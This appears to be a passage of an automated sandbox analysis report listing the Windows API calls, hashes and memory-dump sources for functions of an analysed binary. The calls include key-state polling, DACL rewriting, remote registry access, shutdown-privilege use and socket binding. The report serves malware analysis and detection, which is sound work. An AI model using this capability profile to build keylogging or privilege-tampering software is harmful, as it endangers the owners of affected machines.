                • Opcode ID: 773303a9c7f359096ee8a7915f4131ef2e8d813b0cb032551afe5bdfc84376b0
                • Instruction ID: b6f0c334fa6fd07b34c7a14a9ae7a5269c8f0deb550d1e8b88bea703052bb24c
                • Opcode Fuzzy Hash: 773303a9c7f359096ee8a7915f4131ef2e8d813b0cb032551afe5bdfc84376b0
                • Instruction Fuzzy Hash: C4D06C3201010DBBDF028F84ED06EDE3BAAFB48714F014000BE1856020C732E821AB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0E9C5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • GetFileAttributesW.KERNELBASE(?,00C0D755), ref: 00C0E9C6
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: db5f685d0e012a6106a185be443ed3a181cf65e8f4be0b8acf5bb72f856b2651
                • Instruction ID: 2d6d364cf73e2c8e822d9c24247eb561470dac35c625b8190889b56806dd8dda
                • Opcode Fuzzy Hash: db5f685d0e012a6106a185be443ed3a181cf65e8f4be0b8acf5bb72f856b2651
                • Instruction Fuzzy Hash: 88B0923405461005FD7C0A382A082EE230068433A77D81F95E4BA951E2C33A8D1BE610
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 00C013F2 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00C01989: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C019A4
                  • Part of subcall function 00C01989: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C0142B,?,?,?), ref: 00C019B0
                  • Part of subcall function 00C01989: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C0142B,?,?,?), ref: 00C019BF
                  • Part of subcall function 00C01989: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C0142B,?,?,?), ref: 00C019C6
                  • Part of subcall function 00C01989: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C019DD
                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C0145C
                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C01490
                • GetLengthSid.ADVAPI32(?), ref: 00C014A7
                • GetAce.ADVAPI32(?,00000000,?), ref: 00C014E1
                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C014FD
                • GetLengthSid.ADVAPI32(?), ref: 00C01514
                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C0151C
                • HeapAlloc.KERNEL32(00000000), ref: 00C01523
                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C01544
                • CopySid.ADVAPI32(00000000), ref: 00C0154B
                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C0157A
                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C0159C
                • SetUserObjectSecurity.USER32 ref: 00C015AE
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C015D5
                • HeapFree.KERNEL32(00000000), ref: 00C015DC
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C015E5
                • HeapFree.KERNEL32(00000000), ref: 00C015EC
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C015F5
                • HeapFree.KERNEL32(00000000), ref: 00C015FC
                • GetProcessHeap.KERNEL32(00000000,?), ref: 00C01608
                • HeapFree.KERNEL32(00000000), ref: 00C0160F
                  • Part of subcall function 00C01A23: GetProcessHeap.KERNEL32(00000008,00C01441,?,00000000,?,00C01441,?), ref: 00C01A31
                  • Part of subcall function 00C01A23: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C01441,?), ref: 00C01A38
                  • Part of subcall function 00C01A23: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C01441,?), ref: 00C01A47
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                • String ID:
                • API String ID: 4175595110-0
                • Opcode ID: 1b270433c3a3abeb9552115b34b947ac23f91740bd2ac173f706fc6b0190b3ff
                • Instruction ID: 8c2680efef225314724d308b04f2e810ff4ae54fdb85b179f7d51d15c04358ec
                • Opcode Fuzzy Hash: 1b270433c3a3abeb9552115b34b947ac23f91740bd2ac173f706fc6b0190b3ff
                • Instruction Fuzzy Hash: FB7128B2900209AFDF10DFA5EC89FEEBBB9FF44710F184115F926AA191D7719A05CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C172E9 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                Download Yara Rule
                APIs
                • FindFirstFileW.KERNEL32(?,?), ref: 00C17318
                • FindClose.KERNEL32(00000000), ref: 00C1736C
                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C173A8
                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C173CF
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C1740C
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C17439
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                • API String ID: 3830820486-3289030164
                • Opcode ID: 152f9c35a6c4e8963c39873084d6daab61fe79d72f1cc081faf30afd827b05d6
                • Instruction ID: 2ace21fc105bb5259009e82aa4891b307b0113dc21a407fac0ab90bf7d2b2279
                • Opcode Fuzzy Hash: 152f9c35a6c4e8963c39873084d6daab61fe79d72f1cc081faf30afd827b05d6
                • Instruction Fuzzy Hash: C2D15DB2508344AFC310EF64C891EBFB7ECAF99704F04496EF59586192EB74DA44CB62
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C1A0FA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                Download Yara Rule
                APIs
                • FindFirstFileW.KERNEL32(?,?,772961D0,?,00000000), ref: 00C1A11B
                • FindNextFileW.KERNEL32(00000000,?), ref: 00C1A176
                • FindClose.KERNEL32(00000000), ref: 00C1A181
                • FindFirstFileW.KERNEL32(*.*,?), ref: 00C1A19D
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00C1A1ED
                • SetCurrentDirectoryW.KERNEL32(00C67B94), ref: 00C1A20B
                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C1A215
                • FindClose.KERNEL32(00000000), ref: 00C1A222
                • FindClose.KERNEL32(00000000), ref: 00C1A232
                  • Part of subcall function 00C0E2AE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C0E2C9
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                • String ID: *.*
                • API String ID: 2640511053-438819550
                • Opcode ID: c0671605e614ac5d0329696e09d759f360b357895298da035ff9f5469ba770be
                • Instruction ID: 25f08b8e794b94540fd09bdd9a973e394e8f3506ede5b9cde9045a1ad9fe0dec
                • Opcode Fuzzy Hash: c0671605e614ac5d0329696e09d759f360b357895298da035ff9f5469ba770be
                • Instruction Fuzzy Hash: 2431F4315022197BCB20AFA4EC48FDE73AC9F4A324F2041A5F825A30A0DB71DEC5DA51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C2C7A3 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00C2D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C2C00D,?,?), ref: 00C2D314
                  • Part of subcall function 00C2D2F7: _wcslen.LIBCMT ref: 00C2D350
                  • Part of subcall function 00C2D2F7: _wcslen.LIBCMT ref: 00C2D3C7
                  • Part of subcall function 00C2D2F7: _wcslen.LIBCMT ref: 00C2D3FD
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C2C89D
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00C2C908
                • RegCloseKey.ADVAPI32(00000000), ref: 00C2C92C
                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C2C98B
                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C2CA46
                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00C2CAB3
                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00C2CB48
                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00C2CB99
                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00C2CC42
                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C2CCE1
                • RegCloseKey.ADVAPI32(00000000), ref: 00C2CCEE
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                • String ID:
                • API String ID: 3102970594-0
                • Opcode ID: 7f424afa4a000a80e01a299ce28bf78c1b3e9c5db6305ea8a95559ce6f1bdbbe
                • Instruction ID: fef9d80f18e1d33318641aba1e784b1a078177aeea495aea6d831bbffde1a8cb
                • Opcode Fuzzy Hash: 7f424afa4a000a80e01a299ce28bf78c1b3e9c5db6305ea8a95559ce6f1bdbbe
                • Instruction Fuzzy Hash: 12026F71604210AFC714DF28D8D5E2ABBE5EF89314F18849DF85ACB6A2DB31ED41CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0A54A Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                Download Yara Rule
                APIs
                • GetKeyboardState.USER32(?), ref: 00C0A572
                • GetAsyncKeyState.USER32(000000A0), ref: 00C0A5F3
                • GetKeyState.USER32(000000A0), ref: 00C0A60E
                • GetAsyncKeyState.USER32(000000A1), ref: 00C0A628
                • GetKeyState.USER32(000000A1), ref: 00C0A63D
                • GetAsyncKeyState.USER32(00000011), ref: 00C0A655
                • GetKeyState.USER32(00000011), ref: 00C0A667
                • GetAsyncKeyState.USER32(00000012), ref: 00C0A67F
                • GetKeyState.USER32(00000012), ref: 00C0A691
                • GetAsyncKeyState.USER32(0000005B), ref: 00C0A6A9
                • GetKeyState.USER32(0000005B), ref: 00C0A6BB
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: State$Async$Keyboard
                • String ID:
                • API String ID: 541375521-0
                • Opcode ID: 310b3e678ff2d284206b0c0b88bbe0545b4834e91f786744f0df43a584437157
                • Instruction ID: 0c6038d6759a1dd9822e3b5cb6f7a254d999de0480644f4eed30a092cd125c01
                • Opcode Fuzzy Hash: 310b3e678ff2d284206b0c0b88bbe0545b4834e91f786744f0df43a584437157
                • Instruction Fuzzy Hash: 0341B774908BC96EFF31876098153E9BEB06F11344F0C8059E5E64A2C2DB959FD4CB67
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C24089 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                Download Yara Rule
                APIs
                • CoInitialize.OLE32 ref: 00C240D1
                • CoUninitialize.OLE32 ref: 00C240DC
                • CoCreateInstance.OLE32(?,00000000,00000017,00C40B44,?), ref: 00C24136
                • IIDFromString.OLE32(?,?), ref: 00C241A9
                • VariantInit.OLEAUT32(?), ref: 00C24241
                • VariantClear.OLEAUT32(?), ref: 00C24293
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                • API String ID: 636576611-1287834457
                • Opcode ID: 19fa784691aeb306d3fdeeb4a6e7494a8fbf9f2e10cf7669b3c3af36ac440d79
                • Instruction ID: 7c483ab3ad989e810f2768b53f4fe229940ae2bbbdd97a5a2aff44583534eea6
                • Opcode Fuzzy Hash: 19fa784691aeb306d3fdeeb4a6e7494a8fbf9f2e10cf7669b3c3af36ac440d79
                • Instruction Fuzzy Hash: 7D61BF71208311DFC314DF65E888F6EBBE4AF49714F100959F9919B691CB70ED88CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0F122 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00C01F53: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C01F9D
                  • Part of subcall function 00C01F53: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C01FCA
                  • Part of subcall function 00C01F53: GetLastError.KERNEL32 ref: 00C01FDA
                • ExitWindowsEx.USER32(?,00000000), ref: 00C0F15E
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                • String ID: $ $@$SeShutdownPrivilege
                • API String ID: 2234035333-3163812486
                • Opcode ID: 4bf3ef979dd50964f0572cc8a005fb955089e5e4779dc73abdefb30587998589
                • Instruction ID: cc62e1648bc77d3f477770eccc37fc7e9b85162be45b62ad93767c1b2e10b4ba
                • Opcode Fuzzy Hash: 4bf3ef979dd50964f0572cc8a005fb955089e5e4779dc73abdefb30587998589
                • Instruction Fuzzy Hash: 8401F972624314ABE73466B8EC85FFF726CAB08390F150839FD13E20D1DA615D82D190
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C1A488 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00C1A4D5
                • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00C1A5E8
                  • Part of subcall function 00C141CE: GetInputState.USER32 ref: 00C14225
                  • Part of subcall function 00C141CE: PeekMessageW.USER32 ref: 00C142C0
                • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00C1A505
                • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00C1A5D2
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                • String ID: *.*
                • API String ID: 1972594611-438819550
                • Opcode ID: 66cde5928ac523724e8c9158fef34c2f045e59a9019988fee8ad7d0c1f3dfbf4
                • Instruction ID: 8e984498a4d94d1439f38c837acdc184428a26bc9366321a3fec6a83c39fd321
                • Opcode Fuzzy Hash: 66cde5928ac523724e8c9158fef34c2f045e59a9019988fee8ad7d0c1f3dfbf4
                • Instruction Fuzzy Hash: 2D419F7190920AAFCF15DFA4D849BEEBBB9FF16310F244096E815A21A1D7309F84DB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA225D Relevance: 7.8, APIs: 5, Instructions: 309COMMON
                Download Yara Rule
                APIs
                • DefDlgProcW.USER32(?,?), ref: 00BA22EE
                • GetSysColor.USER32(0000000F), ref: 00BA23C3
                • SetBkColor.GDI32(?,00000000), ref: 00BA23D6
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Color$Proc
                • String ID:
                • API String ID: 929743424-0
                • Opcode ID: 891690f30ff820cbbf24e1f5233ec1c5b97c92e28b931dfeda4f7d6bee77ca00
                • Instruction ID: ee9ed17bb5e1b9c607c6ae23ab93d618a166e17b2dbce9b3ef1845e4862da269
                • Opcode Fuzzy Hash: 891690f30ff820cbbf24e1f5233ec1c5b97c92e28b931dfeda4f7d6bee77ca00
                • Instruction Fuzzy Hash: 3081F4F061C194BEEA28AB3E8C9DF7F29DDDB43700F150189F142C6691CB69CE01E226
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C22163 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00C239AB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C239D7
                  • Part of subcall function 00C239AB: _wcslen.LIBCMT ref: 00C239F8
                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C221BA
                • WSAGetLastError.WSOCK32 ref: 00C221E1
                • bind.WSOCK32(00000000,?,00000010), ref: 00C22238
                • WSAGetLastError.WSOCK32 ref: 00C22243
                • closesocket.WSOCK32(00000000), ref: 00C22272
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                • String ID:
                • API String ID: 1601658205-0
                • Opcode ID: 589257f9a7d802a7188a1d074700cd9c3bb8665bb56df00881887685c79fbf89
                • Instruction ID: b2ec0594e1e173549c3db5a5b20001b5efbfa7d66ff2a131c69ec86733d6f523
                • Opcode Fuzzy Hash: 589257f9a7d802a7188a1d074700cd9c3bb8665bb56df00881887685c79fbf89
                • Instruction Fuzzy Hash: 3A51C071A00210AFD710AF28D896F6A77E5AB05714F048498F91A9F3D3CB71ED418BE1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C325A0 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                • String ID:
                • API String ID: 292994002-0
                • Opcode ID: 6e083eda2c3c760723794b05e38d1b7b265271da38c5eca5c6dad23873eaf509
                • Instruction ID: a92deb0f951bca93a2941e8d2b71c4d5766e9d224ce6d4da4103557f8f337ea5
                • Opcode Fuzzy Hash: 6e083eda2c3c760723794b05e38d1b7b265271da38c5eca5c6dad23873eaf509
                • Instruction Fuzzy Hash: E22106313102409FDB208F2AD855B5B7BE5EF95324F18846CF89ACB251DB31EE42CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BFE5F8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • GetUserNameW.ADVAPI32(?,?), ref: 00BFE60A
                Strings
                Memory Dump Source
